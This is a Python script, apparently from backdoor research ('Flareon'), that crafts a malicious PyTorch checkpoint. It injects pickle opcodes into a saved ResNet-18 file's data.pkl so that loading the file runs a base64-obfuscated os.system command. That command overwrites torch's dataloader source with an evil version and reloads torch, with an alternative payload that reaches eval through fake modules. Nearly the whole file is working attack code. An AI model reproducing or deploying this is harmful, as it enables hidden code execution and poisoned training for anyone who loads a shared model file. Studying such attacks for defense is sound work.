import base64
import io, os, sys, shutil
import pickle, pickletools
import inspect

import torch
import torchvision as tv


class FakeMod(type(sys)):
    modules = {}

    def __init__(self, name):
        self.d = {}
        super().__init__(name)

    def __getattribute__(self, name):
        d = self()
        return d[name]

    def __call__(self):
        return object.__getattribute__(self, 'd')


def attr(s):
    mod, name = s.split(".")
    if mod not in FakeMod.modules:
        FakeMod.modules[mod] = FakeMod(mod)
    d = FakeMod.modules[mod]()
    if name not in d:
        def f():
            pass
        f.__module__ = mod
        f.__qualname__ = name
        f.__name__ = name
        d[name] = f
    return d[name]


def dumps(obj):
    orig = sys.modules
    sys.modules = FakeMod.modules
    s = pickle._dumps(obj)
    sys.modules = orig
    return s


def craft(func, *args, mapping=None):
    class Inject():
        def __reduce__(self):
            if mapping:
                return func, args, (None, mapping), None, None
            return func, args
    return Inject()


def payload():
    import importlib
    import torch
    from torch.utils.data import dataloader
    # a nice warning about the payload
    print(
        "WARNING: Loading this checkpoint replaces"
        "your dataloader with a malicious payload."
        "Are you sure you want to continue?")
    ans = input("Confirm with 'YES': ")
    if ans == 'YES':
        # replaces the dataloader source file
        # with bad_dataloader.py
        source_code = ...
        with open(dataloader.__file__, 'w') as f:
            f.write(source_code)
        # reload torch modules to attack current runtime
        importlib.reload(torch)


def alternative_payload(src):
    tsa = attr('torch.__setattr__')
    tga = attr('torch.__getattribute__')
    b = craft(tga, '__builtins__')
    d = craft(tga, '__dict__')
    u = craft(tga, '__spec__', mapping=dict(__dict__=d))
    obj = [
        craft(tsa, 'u', u),
        craft(tga, 'u', mapping=b),
        craft(attr('torch.eval'), 'print("hello")'),
    ]
    return obj


def inject(src, p):
    proto = 2
    out = io.BytesIO()
    pickler = pickle._Pickler(out, proto)
    src = src.replace('...', f"\"\"\"{open('evil_dataloader.py', 'r').read()}\"\"\"")
    src = base64.b64encode(src.encode())
    src = str(src).replace('b\'', '').replace('\'', '')
    cmd = f'decoded_string=$(echo "{src}" | base64 -d); python -c "${{decoded_string}}"'
    obj = craft(os.system, cmd)
    # obj = alternative_payload(src)
    injection = pickle.dumps(obj)
    for opcode, arg, pos, end_pos in pickletools._genops(injection, yield_end_pos=True):
        if opcode.name in ['STOP']:
            continue
        data = injection[pos:end_pos]
        pickler.framer.commit_frame(force=False)
        pickler.write(data)
    for opcode, arg, pos, end_pos in pickletools._genops(p, yield_end_pos=True):
        data = p[pos:end_pos]
        pickler.framer.commit_frame(force=False)
        pickler.write(data)
    pickler.framer.end_framing()
    return out.getvalue()


def bad_torch_save(function_to_inject, dict_to_save, path, *args, **kwargs):
    # get source code
    source = inspect.getsourcelines(function_to_inject)[0]
    # drop function def line
    source = source[1:]
    # find indent of body
    indent = len(source[0]) - len(source[0].lstrip())
    # strip first indent
    source = [line[indent:].replace('\n', '') for line in source]
    # make into single string
    inject_src = "\n".join(source)
    # normal torch.save
    torch.save(dict_to_save, path, *args, **kwargs)
    # extract zip
    shutil.unpack_archive(path, 'extracted', 'zip')
    name = os.path.splitext(path)[0]
    # inject payload
    pkl_path = os.path.join('extracted', name, 'data.pkl')
    with open(pkl_path, 'rb') as f:
        injected = inject(inject_src, f.read())
    with open(pkl_path, 'wb') as f:
        f.write(injected)
    # archive zip
    shutil.make_archive(path, 'zip', 'extracted')
    shutil.move(f'{path}.zip', f'{path}')


resnet18 = tv.models.resnet18(pretrained=True)
weights = resnet18.state_dict()
# torch.save(weights, 'checkpoint.pth')
bad_torch_save(payload, weights, 'evil_checkpoint.pth')
# Loading `evil_checkpoint.pth` in your code
# will result in ALL FUTURE TRAINING poisoned
# with the Flareon backdoors.
